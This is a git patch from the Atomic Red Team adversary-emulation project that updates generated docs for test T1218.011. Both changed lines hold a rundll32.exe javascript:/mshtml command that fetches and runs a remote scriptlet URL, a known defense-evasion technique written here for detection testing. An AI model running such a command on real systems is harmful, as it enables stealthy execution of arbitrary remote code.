From e457f1c3402f96dfcfce0fa745ff49fab05ad9b8 Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Wed, 3 Aug 2022 15:03:00 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/index.yaml     | 3 +--
 atomics/T1218.011/T1218.011.md | 2 +-
 2 files changed, 2 insertions(+), 3 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 375ad111..e6385be9 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -253,8 +253,7 @@ defense-evasion:
           type: Url
           default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
       executor:
-        command: 'start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication
-          ";document.write();GetObject("script:#{file_url}").Exec();
+        command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();window.close();
 
           '
         cleanup_command: 'taskkill /IM notepad.exe /f
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index de88a8c0..86dfd3dd 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -61,7 +61,7 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe
 
 
 ```cmd
-start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();window.close();
 ```
 
 #### Cleanup Commands: